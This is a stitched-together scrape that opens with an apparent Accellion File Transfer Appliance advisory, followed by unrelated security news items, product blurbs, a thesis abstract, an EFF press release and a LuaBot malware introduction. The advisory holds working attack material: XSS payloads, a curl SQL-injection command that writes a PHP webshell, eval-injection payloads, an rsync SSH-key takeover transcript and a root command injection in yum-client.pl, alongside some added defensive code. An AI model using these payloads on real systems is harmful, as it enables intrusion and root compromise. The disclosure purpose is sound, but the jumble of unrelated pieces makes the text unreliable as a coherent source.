https://<fta>/courier/web/getimageajax.php
?documentname="onerror="prompt(document.domain)//

3. XSS in wmInfo.html

https://<fta>/courier/web/wmInfo.html
?msg=ssologout
&loginurl="><svg/onload="prompt(document.domain)


Pre-Auth SQL Injection leads to RCE (CVE-2016-2351)

After code review, a pre-authentication SQL Injection vulnerability was found in FTA. This vulnerability gives malicious users access to sensitive data and personal information on the server through SQL Injection, and lets them achieve remote code execution (RCE) by further exploiting the privilege-escalation vulnerabilities.
The key to this problem lies in the client_properties( ... ) function called by security_key2.api:

/home/seos/courier/security_key2.api
// ...
$password = _decrypt( $password, _generate_key( $g_app_id, $client_id, $g_username ) );
opendb();
$client_info = client_properties( $client_id )[0];
// ...

Among these parameters, $g_app_id, $g_username, $client_id and $password are controllable by the attacker. Although the function _decrypt( ... ) handles the password, it is not involved in triggering the vulnerability.
One thing that needs special attention is that the value of $g_app_id is treated as a global variable representing the current Application ID in use, and is used accordingly in opendb( ). The code in opendb( ) includes the following lines:

$db = DB_MASTER . $g_app_id;
if(!@mysql_select_db( $db ))

In mysql_select_db, the name of the database to be opened is controllable by the user. If a wrong value is given, the program aborts. Therefore, $g_app_id must be forged correctly.

The following lines are the most important function client_properties( $client_id ).

function client_properties($client_id = '', $user = '', $manager = '', $client_type = 0, $client_name = '', $order_by = 'client_id', $order_type = 'a', $limit = '', $offset = '', $exclude_del = 1, $user_type = '', $user_status = '') {
    $sql = ($user_type == '' ? 'SELECT t_mail_server.* FROM t_mail_server ' : 'SELECT t_mail_server.*, t_profile.c_flag as profile_flag FROM t_mail_server, t_profile ');
    $filter['client_id'] = $client_id;    // attacker-controlled, passed on unescaped
    $filter['client_name'] = $client_name;
    $filter['client_type'] = $client_type;
    $filter['user'] = mysql_escape_like( $user );
    $filter['user_type'] = $user_type;
    $filter['manager'] = $manager;
    $filter['user_status'] = $user_status;
    $sql .= construct_where_clause( $filter, $exclude_del );

    // ...

    $result = array(  );
    // the assembled statement is executed as-is
    $db_result = @mysql_query( $sql ) or fatal_error( 'exec:mysql_query(' . $sql . ') respond:' . mysql_error(  ), __FILE__, 221 );
    // ...
}

function construct_where_clause($filter, $exclude_del = 1) {
    $where_clause = array(  );
    $where_clause[] = 'c_server_id  != \'999\'';

    if ($exclude_del) {
        $where_clause[] = '!(t_mail_server.c_flag & ' . CLIENT_DELETED . ')';
    }
    if ($filter['client_id'] != '') {
        // no mysql_real_escape_string() here, unlike every other filter below
        $where_clause[] = 'c_server_id = \'' . $filter['client_id'] . '\'';
    }
    if ($filter['manager'] != '') {
        $filter['manager'] = mysql_real_escape_string( $filter['manager'] );
        $where_clause[] = 'c_manager = \'' . $filter['manager'] . '\'';
    }
    if ($filter['client_name'] != '') {
        $filter['client_name'] = mysql_real_escape_string( $filter['client_name'] );
        $where_clause[] = 't_mail_server.c_name LIKE \'%' . $filter['client_name'] . '%\'';
    }
    if (( $filter['user'] != '' && $filter['user'] != '%%' )) {
        $filter['user'] = mysql_real_escape_string( $filter['user'] );
        $where_clause[] = 't_mail_server.c_user_id LIKE \'' . $filter['user'] . '\'';
    }
    // ...
}

The parameters passed to client_properties( ... ) are assembled into SQL statements. Of all the functions taking part in the assembly, construct_where_clause( ... ) is the crucial one.
In construct_where_clause( ... ), every parameter is protected with mysql_real_escape_string except $client_id. Judging from the coding style of the source, this is probably an oversight. SQL Injection can therefore be triggered by sending the corresponding parameters along the program flow described above.

In addition, the FTA database user has root privileges with the FILE privilege (FILE_PRIV) enabled. By using INTO OUTFILE to write PHP code into a writable directory, an attacker can execute code remotely.

PoC

$ curl https://<fta>/courier/1000@/security_key2.api -d "aid=1000&user_id=1&password=1&client_id=' OR 1=1 LIMIT 1 INTO OUTFILE '/home/seos/courier/themes/templates/.cc.php' LINES TERMINATED BY 0x3c3f...#"

The created PHP file will be located at

http://<fta>/courier/themes/templates/.cc.php
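The c_server_id filter from construct_where_clause( ... ) rebuilt two ways, as an added example that is not Accellion's code: the concatenating form the advisory describes beside a parameterised form, run against an in-memory SQLite copy of t_mail_server constructed here. Column and flag names follow the advisory; the rows, the value of CLIENT_DELETED and the use of SQLite are assumptions.

```python
"""Added example (not Accellion's code): the client_id filter built the
vulnerable way and the parameterised way, run against a constructed
SQLite stand-in for t_mail_server."""
import sqlite3

CLIENT_DELETED = 2  # assumed value of the CLIENT_DELETED flag bit


def open_sample_db():
    """Constructed stand-in for the FTA t_mail_server table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE t_mail_server (c_server_id TEXT, c_name TEXT, "
               "c_user_id TEXT, c_manager TEXT, c_flag INTEGER)")
    db.executemany("INSERT INTO t_mail_server VALUES (?, ?, ?, ?, ?)", [
        ("1000", "acme", "alice@example.test", "mgr1", 0),
        ("1001", "globex", "bob@example.test", "mgr2", 0),
        ("1002", "initech", "carol@example.test", "mgr3", CLIENT_DELETED),
        ("999", "internal", "sys@example.test", "mgr0", 0),
    ])
    return db


def vulnerable_where_clause(client_id, exclude_del=1):
    """Mirrors the advisory's construct_where_clause(): client_id is
    concatenated into the SQL text without any escaping."""
    where = ["c_server_id != '999'"]
    if exclude_del:
        where.append(f"NOT (t_mail_server.c_flag & {CLIENT_DELETED})")
    if client_id != "":
        where.append(f"c_server_id = '{client_id}'")
    return "WHERE " + " AND ".join(where)


def vulnerable_lookup(db, client_id):
    sql = "SELECT c_server_id FROM t_mail_server " + vulnerable_where_clause(client_id)
    return [row[0] for row in db.execute(sql)]


def safe_where_clause(client_id, exclude_del=1):
    """Hardened form: user-controlled values become bound parameters and
    only fixed SQL text is concatenated, so quotes in client_id are data."""
    where, params = ["c_server_id != '999'"], []
    if exclude_del:
        where.append("NOT (t_mail_server.c_flag & ?)")
        params.append(CLIENT_DELETED)
    if client_id != "":
        where.append("c_server_id = ?")
        params.append(client_id)
    return "WHERE " + " AND ".join(where), params


def safe_lookup(db, client_id):
    clause, params = safe_where_clause(client_id)
    sql = "SELECT c_server_id FROM t_mail_server " + clause
    return [row[0] for row in db.execute(sql, params)]


if __name__ == "__main__":
    db = open_sample_db()
    # Same "' OR 1=1" shape as the advisory's PoC; "--" is used as the
    # comment marker because SQLite does not accept MySQL's "#".
    payload = "' OR 1=1 --"
    print("vulnerable:   ", vulnerable_lookup(db, payload))  # every row, deleted and 999 included
    print("parameterised:", safe_lookup(db, payload))        # []
```

The vulnerable path returns every row, including the deleted client and the reserved server 999 that the fixed predicates were meant to exclude, because the injected OR overrides them; the parameterised path treats the whole payload as a literal id and matches nothing.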


Known-Secret-Key leads to Remote Code Execution

In the previous vulnerability, one requirement for remote code execution is a writable directory in which to place the webshell. In reality there may be no writable directory available, in which case the SQL Injection alone does not yield code execution. But there is another way to accomplish RCE.

The precondition for this vulnerability is knowing the secret key stored in the database.

This is not a problem, since the database can be read through the SQL Injection vulnerability described above. And although the code contains some parameter filters, they can be bypassed!

/home/seos/courier/sfUtils.api
$func_call = decrypt( $_POST['fc'] );   // controllable once the secret key is known
$orig_func = '';
if (preg_match( '/(.+)\(.*\)/', $func_call, $func_match )) {
    $orig_func = $func_call;
    $func_call = $func_match[1];        // only the part before "(" is whitelisted
}
$cs_method = array( 'delete_session_cache', 'delete_user_contact', 'valid_password', 'user_password_update_disallowed', 'user_password_format_disallowed', 'get_user_contact_list', 'user_email_verified', 'user_exist_allow_direct_download', 'user_profile_auth' );
if (( !$func_call || !in_array( $func_call, $cs_method ) )) {
    return false;
}
if ($orig_func) {
    $func_call = $orig_func;            // the full, unfiltered call text is restored
}
if ($func_call  == 'get_user_contact_list') {
    if (!$_csinfo['user_id']) {
        return false;
    }
    if (preg_match( '/[\\\/"\*\:\?\<\>\|&]/', $_POST['name'] )) {
        return false;
    }
    $func_call = 'echo(count(' . $func_call . '("' . $_csinfo['user_id'] . '", array("nickname"=>"' . addslashes( $_POST['name'] ) . '"))));';
} else {
    if (isset( $_POST['p1'] )) {
        $func_param = array(  );
        $p_no = 1;

        while (isset( $_POST['p' . $p_no] )) {
            $func_param[] = str_replace( '\'', '\\\'', str_replace( '$', '\\$', addslashes( $_POST['p' . $p_no] ) ) );
            ++$p_no;
        }
        $func_call = 'echo(' . $func_call . '("' . join( '", "', $func_param ) . '"));';
    }
}
echo @eval( $func_call );               // the reassembled string is evaluated as PHP

Once the secret key is known, the output of decrypt( $_POST[fc] ) is controllable. Although the regular expression that follows acts as a function-name whitelist, it does not filter the parameters.
The only restriction on injecting arbitrary code into the parameters is therefore that the strings must not contain ( ). Thanks to PHP's flexibility there are many ways to work with that; two examples follow.


Execute system commands directly by using backticks (`)

user_profile_auth(`$_POST[cmd]`);

A more elegant way: use the include syntax to include the tmp_name of an uploaded file, which sidesteps the parentheses restriction entirely.

user_profile_auth(include $_FILES[file][tmp_name]);


Local Privilege Escalation (CVE-2016-2352 and CVE-2016-2353)

After gaining code execution in the PHP pages, we found that we were running as the user nobody. To prepare further escalation we examined the web environment, and identified two possible privilege escalation vulnerabilities.

1. Incorrect Rsync Configuration
/etc/opt/rsyncd.conf
log file = /home/soggycat/log/kennel.log
...
[soggycat]
path = /home/soggycat
uid = soggycat
read only = false
list = false
...

The rsync module soggycat exposes the directory /home/soggycat/ readable and writable to anyone, so an SSH key can be written into /home/soggycat/.ssh/ and then used to log in as soggycat.

bash-3.2$ id
uid=99(nobody) gid=99(nobody) groups=99(nobody)

bash-3.2$ rsync 0::soggycat/.ssh/
drwx------        4096 2016/01/29 18:13:41 .
-rw-r--r--         606 2016/01/29 18:13:41 authorized_keys

bash-3.2$ rsync 0::soggycat/.ssh/authorized_keys .
bash-3.2$ cat id_dsa.pub >> authorized_keys
bash-3.2$ rsync authorized_keys 0::soggycat/.ssh/

bash-3.2$ ssh -i id_dsa -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no soggycat@localhost id
Could not create directory '/.ssh'.
Warning: Permanently added '0,0.0.0.0' (RSA) to the list of known hosts.
uid=520(soggycat) gid=99(nobody) groups=99(nobody)


2. Command Injection in “yum-client.pl”

To enable system updates through the web UI, the sudoers configuration in FTA makes an exception and allows the user nobody to execute commands directly with root privileges and update software with the program yum-client.pl.

/etc/sudoers
...
Cmnd_Alias      YUM_UPGRADE = /usr/bin/yum -y upgrade
Cmnd_Alias      YUM_CLIENT = /usr/local/bin/yum-client.pl
...
# User privilege specification
root     ALL=(ALL) ALL
admin    ALL =NOPASSWD: UPDATE_DNS, UPDATE_GW, UPDATE_NTP, RESTART_NETWORK, CHMOD_OLDTEMP ...
nobody   ALL =NOPASSWD: SSL_SYSTEM, ADMIN_SYSTEM, IPSEC_CMD, YUM_CLIENT
soggycat ALL =NOPASSWD: ADMIN_SYSTEM, IPSEC_CMD, CHOWN_IPSEC, UPDATE_IPSEC, YUM_CLIENT
radmin   ALL =NOPASSWD: RESET_APPL
...


YUM_CLIENT is the command that performs updates. Part of its code is as follows:

/usr/local/bin/yum-client.pl
...
GetOptions (
   'help' => \$help,
   'download_only' => \$download_only,
   'list' => \$list,
   'cache' => \$cache,
   'clearcache' => \$clearcache,
   'cdrom=s' => \$cdrom,
   'appid=s' => \$appid,
   'servername=s' => \$servername,
   'version=s' => \$version,
   'token=s' => \$token);

my $YUM_CMD = "/usr/bin/yum";
if ($cache){
  $YUM_CMD = "$YUM_CMD -C";
}

# if this is based on RHEL 5, change the repository
my $OS = `grep -q 5 /etc/redhat-release && echo -n 5`;
my $LOGFILE = "/home/seos/log/yum-client.log";
my $STATUSFILE = "/home/seos/log/yum-client.status";
my $YUMCONFIG = "/etc/yum.conf";
my $YUMDIFF_FILE = '/home/seos/log/yum.diff';

if ($cdrom){
  if ($OS eq "5"){
     $YUM_CMD = "$YUM_CMD -c $cdrom_path/yum.conf-5";
  }else{
     $YUM_CMD = "$YUM_CMD -c $cdrom_path/yum.conf";
  }
  system("mkdir -p /mnt/cdrom && mount -o loop $cdrom $cdrom_path") == 0 or fdielog($LOGFILE,"unable to mount: $!");
}

Taking a closer look at yum-client.pl, a Command Injection vulnerability was found in the --cdrom parameter, whose value is interpolated unquoted into the mount command passed to system(). This lets an attacker inject arbitrary commands through the parameter and execute them as root.

Thus, using the commands below

bash-3.2$ id
uid=99(nobody) gid=99(nobody) groups=99(nobody)

bash-3.2$ sudo /usr/local/bin/yum-client.pl --cdrom='$(id > /tmp/.gg)'

mount: can't find /mnt/cdrom in /etc/fstab or /etc/mtab
unable to mount: Bad file descriptor at /usr/local/bin/yum-client.pl line 113.

bash-3.2$ cat /tmp/.gg
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

will grant execution freely as root!

Backdoor


After gaining the highest privilege and carrying out server recon, we found that several backdoors had already been planted on FTA hosts. One of them is an IRC botnet that had been mentioned in Niara's report "Accellion File Transfer Appliance Vulnerability".
Apart from that, two additional PHP webshells of different types, which had NEVER been noted in public reports, were also identified. From a review of the Apache logs, these backdoors may have been placed by exploiting CVE-2015-2857, discovered in mid-2015.

One of the backdoors is PHPSPY, found on 62 of the hosts online globally. It was placed at

https://<fta>/courier/themes/templates/Redirector_Cache.php

The other is WSO, found on 9 of the hosts online globally, placed at

https://<fta>/courier/themes/templates/imag.php
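A defender checking an FTA host for the backdoors above can start from the Apache access log, since a theme template directory has no reason to serve PHP. The following is an added example, not part of the advisory or of Accellion's product: it parses Common Log Format lines, flags any request for a .php file under /courier/themes/templates/ (tagging the names the advisory reports, including the .cc.php name its PoC writes), and counts hits per client. The log lines are constructed.

```python
"""Added example (not from the advisory): flag Apache access-log requests
for PHP files under the FTA templates directory named in the advisory."""
import re
from collections import Counter

# PHP files the advisory found in the templates directory, plus the name
# its SQL-injection PoC writes there. Any other .php under that path is
# still flagged, as unexpected.
KNOWN_WEBSHELLS = {
    "/courier/themes/templates/Redirector_Cache.php",  # PHPSPY
    "/courier/themes/templates/imag.php",              # WSO
    "/courier/themes/templates/.cc.php",               # PoC webshell name
}
TEMPLATES_PHP = re.compile(r"^/courier/themes/templates/[^?\s]*\.php$")

# Common Log Format: host ident user [time] "METHOD PATH PROTO" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log (hosts are documentation-range addresses).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Feb/2016:09:12:01 +0000] "GET /courier/web/1000@/wmLogin.html HTTP/1.1" 200 5123
203.0.113.5 - - [10/Feb/2016:09:12:04 +0000] "POST /courier/1000@/security_key2.api HTTP/1.1" 200 221
198.51.100.7 - - [10/Feb/2016:09:13:10 +0000] "GET /courier/themes/templates/.cc.php?c=id HTTP/1.1" 200 87
198.51.100.7 - - [10/Feb/2016:09:20:44 +0000] "POST /courier/themes/templates/imag.php HTTP/1.1" 200 4410
192.0.2.9 - - [10/Feb/2016:09:21:00 +0000] "GET /courier/themes/templates/style.css HTTP/1.1" 200 902
192.0.2.9 - - [10/Feb/2016:09:22:30 +0000] "GET /courier/themes/templates/Redirector_Cache.php HTTP/1.1" 404 310
198.51.100.7 - - [10/Feb/2016:09:25:12 +0000] "GET /courier/themes/templates/cache_tmp.php HTTP/1.1" 200 12
"""


def parse_line(line):
    """Parse one CLF line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["path"].split("?", 1)[0]   # drop the query string before matching
    rec["status"] = int(rec["status"])
    return rec


def find_webshell_hits(log_text):
    """Return (host, path, status, tag) for every request to a PHP file
    under the templates directory. A 404 is reported too: a probe for a
    known backdoor name is itself worth knowing about."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not TEMPLATES_PHP.match(rec["path"]):
            continue
        tag = "known-webshell" if rec["path"] in KNOWN_WEBSHELLS else "unexpected-php"
        hits.append((rec["host"], rec["path"], rec["status"], tag))
    return hits


def hosts_by_hit_count(hits):
    """Count flagged requests per client address."""
    return Counter(hit[0] for hit in hits)


if __name__ == "__main__":
    found = find_webshell_hits(SAMPLE_LOG)
    for hit in found:
        print(hit)
    print(hosts_by_hit_count(found).most_common())
```

On the sample log this flags four requests (three known names, one unexpected PHP file) and attributes three of them to the same client; on a real host the same check should be paired with a directory listing of /courier/themes/templates/ for PHP files that the product did not ship.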


Acknowledgement


The vulnerabilities described in this advisory were identified in early 2016 while looking for vulnerabilities in Facebook; see the article "How I Hacked Facebook, and Found Someone's Backdoor Script".
Upon discovering the FTA vulnerabilities in early February, I notified Facebook and Accellion, and both were very responsive. Accellion responded immediately, issuing patch FTA_9_12_40 on February 12th and notifying all affected customers about the vulnerabilities with instructions to install the patch. Accellion has been very communicative and cooperative throughout this process.

Timeline

  • Feb 6, 2016 05:21 Contact Accellion for vulnerability report
  • Feb 7, 2016 12:35 Send the report to Accellion Support Team
  • Mar 3, 2016 03:03 Accellion Support Team notifies patch will be made in FTA_9_12_40
  • May 10, 2016 15:18 Request Advisory submission approval and report the new discovery of two backdoors to Accellion
  • Jun 6, 2016 10:20 Advisory finalized by mutual consent


          Malware (Virus) Builds a Zombie Network of Almost 300 Thousand Smart Devices        


Security researchers at Kaspersky discovered this week a piece of malware that affects smart devices. Called Hajime, the malware builds a zombie network out of devices such as household appliances. According to the experts, almost 300 thousand devices have already been affected.
So far, traces of the malicious file have been found in DVRs, webcams and routers, but it can affect any device with internet access. Once infected, the devices become part of a botnet controlled by someone else, without the owner's knowledge.
Kaspersky indicates that the problem has affected Iran, Vietnam and Brazil. The company stressed that such networks are generally used for DDoS attacks and for sending spam.
For now, the purpose of the zombie network, which keeps growing, is unknown. "The botnet is getting bigger and bigger, but its purpose remains unknown. We have not found traces of any kind of attack or malicious activity," says Konstantin Zykov, a Kaspersky researcher.
Protect yourself: the company advises users to change their passwords and update their devices' firmware.

          iPhone: Device Paired Tool, to find out which iPhone or iPad has connected to your Windows or macOS and protect yourself        
The risk that exists when an iPhone is connected to a computer is well known to everyone. From the computer paired with the iPhone, many attacks can be carried out against the iPhone to steal its data, trojanize it, and so on. It is one of the weaknesses known to all.

Figure 1: iPhone: Device Paired Tool, to find out which
iPhone or iPad has connected to your Windows or macOS and protect yourself

As you know, more than three years ago I gave a talk that dealt with precisely this: when an iPhone is paired with a Windows computer, the security of the phone is delegated to the security of that Windows computer.


Figure 2: Your iPhone is as (in)secure as your Windows

I discussed this topic with my friend Kevin Mitnick over a video conference a couple of years ago, when he was writing his latest book, "The Art of Invisibility". This was one of the things that came up, and we wondered how to check a computer to find out which iPhones had connected to it, or in other words, which devices are paired with it and have granted the computer special trust.


With this in mind, and with the publication of the 2nd edition of the book Hacking iOS: iPhone & iPad also in mind, I asked my colleagues to build a small tool not only to review the list of paired devices, but also to be able to delete those keys.
That is how the Metasploit module by Pablo González (@pablogonzalezpe) first came about: once you have reached a computer, it searches for these paired devices, as we saw in the article "Which iOS devices have been paired with this Windows or macOS?".

Figure 5: iPhone Pairing Detector module for Metasploit

And for Windows and macOS users, my colleagues Rodolfo Bordón and Ioseba Palop built a tool for each of the two operating systems, called Device Paired Tool.

Figure 6: Device Paired Tool from ElevenPaths for Windows and macOS

It works very simply. It is installed on your Windows or macOS, and by opening the tool you can see the list of all the devices that have been paired with the computer; the pairing keys can also be deleted at any time.

Figure 7: List of iOS devices connected to a macOS

It also stays resident, and when any iPhone or iPad is disconnected it allows a secure unpairing, automatically deleting all the pairing keys that were generated.

Figure 8: Device unpaired. Delete keys?

These are small tools we built in the ElevenPaths lab, and you can download them now for everyday use. If you have to connect an iPhone or iPad to any computer, do not forget to delete those keys when you disconnect it. For your own security.

Saludos Malignos!

          mASSAP: Controla en tiempo real la seguridad de las apps móviles        
Hace ya tiempo que os hablé de Path6, el servicio que habíamos diseñado en ElevenPaths para controlar en tiempo real la seguridad de las apps móviles publicadas en los markets de iOS y Android. La idea es poder saber en tiempo real cuáles son las vulnerabilidades que tienen tanto las apps de tu empresa como las apps que tienes aprobadas en las listas blancas de los MDM para poder actuar en consecuencia.

Figura 1: mASSAP: Controla en tiempo real la seguridad de las apps móviles

El proyecto se construyó sobre la base de Tacyt [Codename Path5] y recibió el Codename Path6, con el que lo presentamos en el pasado Security Innovation Day 2016 en Madrid, con unos casos de uso muy claros, y aún si tener asignado su nombre.


Figura 2: Presentación de Path6 en el Security Innovation Day 2016

Con el paso del tiempo, el producto se hizo mayor y paso de la fase de alpha, a beta, y de beta a versión final con el nombre de "mASAPP" y pudimos verlo en acción en el Security Day 2017, donde nuestro compañero Víctor Mundilla lo presentó.


Figura 3: ¿Qué fue de Path6? Hola mASAPP

Hoy en día el producto ya cuenta con muchos clientes, y lo contamos tal y como se ve en el siguiente vídeo promocional de mASAP.


Figure 4: mASAPP promotional video

But we wanted to go one step further and let technical people understand its details, so we recorded a special ElevenPaths Talk, just published, which I leave here so you can see how it works and its latest features in detail.


Figure 5: ElevenPaths Talk on "mASAPP"

If you want to learn more about this product you can visit the mASAPP page on the ElevenPaths website and request a trial through our contact form.

Saludos Malignos!

          Winnti Hackers Use GitHub to Control Botnet        
          Comment by tkahner on "Hacker allegedly hijacks 150,000 network printers"        
That is certainly not a "flaming botnet" but an "insulting botnet", which also makes more sense. Flame wars aren't wars fought with flames either, but a verbal exchange of blows at an insulting level.
          A visit from the friendly botnet from China        
On Thursday I had to learn the hard way that it is not a good idea to keep a wiki with open registration and unrestricted editing on the server. Thursday, half past five in Germany, and the server is at 300%-400% load. After some … Continue reading
          Antivirus: A Trojan that steals passwords and banking data        
It seems that the danger is not going to end: Zeus has grown into a botnet. It steals account information and forwards it to criminals; trade secrets are also at risk. We asked several security experts how real the threat really is and whether the best antivirus programs detect this virus from the beginning. The malicious software […]
          ZeroAccess Botnet Down, But Not Out        
Authorities in Europe joined Microsoft Corp. this week in disrupting "ZeroAccess," a vast botnet that has enslaved more than two million PCs with malicious software in an elaborate and lucrative scheme to defraud online advertisers.
          Reddit Suffers Major DDoS        
Reddit Slammed By Massive Online Attack: "Reddit suffered a massive distributed denial-of-service (DDoS) attack Friday that stretched into the afternoon. At 6:02 A.M., the Reddit status Twitter account tweeted that the website was working to recover from what appeared to be a DDoS. A DDoS is when a botnet is sent out to cripple […]"
          Massive cyberattack the result of malware-infected IoT devices        
The widespread internet outage that affected a number of the US's biggest websites on Friday was the result of a huge distributed denial of service (DDoS) attack on Dyn, a managed DNS provider. Now security expert Brian Krebs, of Krebs on Security, has reported that the attack was carried out through the use of a botnet using the Mirai … Continue reading
          Aug 21, 2017: PhD Thesis Defense: Techniques and Solutions for Addressing Ransomware Attacks        

Title: Techniques and Solutions for Addressing Ransomware Attacks

Speaker: Amin Kharraz, PhD Candidate, College of Computer and Information Science at Northeastern University

Location: Northeastern University, 805 Columbus Avenue, Interdisciplinary Science and Engineering Complex (ISEC), 6th Floor, Room #601, Boston, Massachusetts 02120

Abstract

Ransomware is a form of extortion-based attack that locks the victim's digital resources and requests money to release them. Although the concept of ransomware is not new (such attacks date back at least as far as the 1980s), this type of malware has recently experienced a resurgence in popularity. In fact, over the last few years, a number of high-profile ransomware attacks were reported. Very recently, the WannaCry ransomware infected thousands of vulnerable machines around the world and substantially disrupted critical services such as the British healthcare system. Given the size and variety of the threats we are facing today, solutions that effectively detect and analyze unknown ransomware attacks are necessary.

In this thesis, we argue that it is possible to extend existing defense mechanisms and protect user data from a large number of cryptographic ransomware attacks. To support this claim, in the first part of the thesis we perform an evolution-based analysis to understand the destructive behavior of ransomware attacks. We show that by monitoring the interaction of malicious processes with the operating system, it is possible to design practical defense mechanisms that can stop even very successful cryptographic ransomware attacks. In the second part, we propose a novel dynamic analysis system, called Unveil, that is designed to analyze ransomware attacks and model their interactions. In the third and last part, we propose an end-point framework, called Redemption, to protect user data from ransomware attacks. We present an operating-system-independent design, and also provide implementation details showing that such lightweight solutions can be integrated into existing operating systems while achieving zero data loss in a large number of successful ransomware attacks.

About the Speaker

Amin Kharraz is a PhD student in the Information Assurance program at Northeastern University’s College of Computer and Information Science, advised by Professor Engin Kirda. Amin’s research interests span a wide range of topics in systems security, focusing on operating systems, binary analysis, and malware and botnet detection. He is a member of Northeastern’s Secure Systems Laboratory (SecLab) located in 132 Nightingale Hall.

Before joining Northeastern, Amin was a research assistant at the High Performance Computing Architectures and Networks Laboratory (HPCAN), at Sharif University of Technology, located in Tehran, Iran.

Committee

Professor Engin Kirda, Professor, Interdisciplinary with the College of Computer and Information Science (CCIS) and the College of Engineering (COE) at Northeastern University
Professor William Robertson, Associate Professor, Interdisciplinary with the College of Computer and Information Science (CCIS) and the College of Engineering (COE) at Northeastern University
Professor Long Lu, Professor, College of Computer and Information Science (CCIS) at Northeastern University
Professor Manuel Egele, Assistant Professor, Department of Electrical and Computer Engineering (ECE) at Boston University



          #MorningMonarchy: April 18, 2017        
Leaked links, smartphone rehab and a botnet's final bow + this day in history w/the San Francisco earthquake and our song of the day by Royal Blood on your Morning Monarchy for April 18, 2017.
          A botnet using the Tor anonymization network and Tor hidden services        
Secuobs.com: 17/12/2012 - secuobs: A botnet using the Tor anonymization network and Tor hidden services
          Viruses are back in force: statistics        

According to the statistics, the spam rate seems to be stabilizing at around 55%. Botnets are being used less and less to send spam. Viruses, on the other hand, are rising sharply: there are more of them, they spread faster and they are more targeted. They call for heightened attention and vigilance from every user. (...)

Full article: Viruses are back in force: statistics


          Statistics and trends in spam rates        

The graphs below show the number of spam messages and viruses received by Altospam across all of its traffic. The second graph shows, as a percentage of all spam received by Altospam, the share sent by botnets.

The spam level rose significantly in March 2014, approaching a ratio of 80% spam out of the total number of emails received by all of our customers. (...)

Full article: Statistics and trends in spam rates


          Botnet statistics        

As a reminder, botnets are networks of computers infected with malicious software. A botnet master controls "his" botnet remotely without the owners of the infected PCs being aware of it. (...)

Full article: Botnet statistics


          EFF Urges Citizens, Websites to Fight Rule Changes Expanding Government Powers to Break Into Users’ Computers        
Changes to Rule 41 Will Greatly Increase Law Enforcement Hacking, Surveillance

San Francisco—The Electronic Frontier Foundation (EFF), the Tor Project, and dozens of other organizations are calling today on citizens and website operators to take action to block a new rule pushed by the U.S. Justice Department that would greatly expand the government’s ability to hack users’ computers and interfere with anonymity on the web.

EFF and over 40 partner organizations are holding a day of action for a new campaign—noglobalwarrants.org—to engage citizens about the dangers of Rule 41 and push U.S. lawmakers to oppose it. The process for updating these rules—which govern federal criminal court processes—was intended to deal exclusively with procedural issues. But this year a U.S. judicial committee approved changes in the rule that will expand judicial authority to grant warrants for government hacking.

“The government is attempting to use a process designed for procedural changes to expand its investigatory powers,” said EFF Activism Director Rainey Reitman. “Make no mistake: these changes to Rule 41 will result in a dramatic increase in government hacking. The government is trying to avoid scrutiny and sneak these new powers past the public and Congress through an obscure administrative process.”

Right now, Rule 41 only authorizes federal magistrate judges to issue warrants to conduct searches in the judicial district where the magistrate is located. The new Rule 41 would for the first time authorize magistrates to issue warrants when “technological means,” like Tor or virtual private networks (VPNs), are obscuring the location of a computer. In these circumstances, the rule changes would authorize warrants to remotely access, search, seize, or copy data on computers, wherever in the world they are located.

“Tor users worldwide could be affected by these new rules,” said Kate Krauss, Director of Public Policy and Communications for the Tor Project. “Tor is used by journalists, members of Congress, diplomats, and human rights activists who urgently need its protection to safeguard their privacy and security—but these rules will give the Justice Department new authority to snoop into their computers."

The changes to Rule 41 would also take the unprecedented step of allowing a court to issue a warrant to hack into the computers of innocent Internet users who are themselves victims of a botnet, EFF and its partners said in a letter to members of Congress today.

EFF and its partners launched noglobalwarrants.org, a campaign page outlining problems with the changes to Rule 41 and listing over 40 Internet companies, digital privacy providers, and public interest groups that support the project. The coalition is asking website owners to embed on their sites unique code that will display a banner allowing people to email members of Congress or sign a petition opposing Rule 41. The groups are also calling on citizens to speak out against Rule 41 on social media and blogs. The aim is to send a message to Congress that it should not authorize this expansion of government hacking and must reject Rule 41 changes.

For the coalition letter:
https://www.eff.org/document/rule-41-coalition-letter

For noglobalwarrants.org:
https://noglobalwarrants.org/

Contact:
Rainey Reitman, Activism Director
Mark Rumold, Senior Staff Attorney

          INFOGRAPHIC: THE DARK SIDE OF THE INTERNET        

If you're browsing online now, what you see is only the surface web, the part most of us are familiar with, where every site is indexed by search engines and easily accessible. But it's only the tip of the iceberg, comprising only 10 percent of the total size of the internet. The remaining 90 percent is what is known as the Deep Web, which includes the part that's 100 percent anonymous: the Dark Web. In simple terms, the Dark Web is the hidden side of the internet. It's an area that evokes images of illegal pornography, black markets, hacking groups, botnet operations (those associated with spam, fraud and malicious attacks), and the like. Learn more about this dark, hidden side of the internet from the following infographic by Cartwright King Solicitors.

http://images.sort-cms.co.uk/cartwrightking/The-Dark-Web-final-final.png



          LuaBot: Malware targeting cable modems        
During mid-2015 I disclosed some vulnerabilities affecting multiple ARRIS cable modems. I wrote a blogpost about ARRIS' nested backdoor and detailed some of my cable modem research at the 2015 edition of the NullByte Security Conference.

CERT/CC released the Vulnerability Note VU#419568 and it got lots of media coverage. I did not provide any PoCs at that time because I was pretty sure that those vulnerabilities were easily wormable... And guess what? Someone has been actively exploiting those devices since May 2016.

The malware targets Puma 5 (ARM/Big Endian) cable modems, including the ARRIS TG862 family. The infection happens in multiple stages and the dropper is very similar to the many common worms that target embedded devices of multiple architectures. The final stage is an ARMEB build of the LuaBot malware.


The ARMEL build of LuaBot was dissected in a blogpost from Malware Must Die, but this specific ARMEB build was still unknown/undetected at the time. The sample was first submitted to VirusTotal on 2016-05-26 and it still has a 0/0 detection rate.



Cable Modem Security and ARRIS Backdoors

Before we go any further, if you want to learn about cable modem security, grab the slides from my talk "Hacking Cable Modems: The Later Years". The talk covers many aspects of the technology used to manage cable modems, how the data is protected, how the ISPs upgrade the firmwares and so on.


Pay special attention to the slide #86:


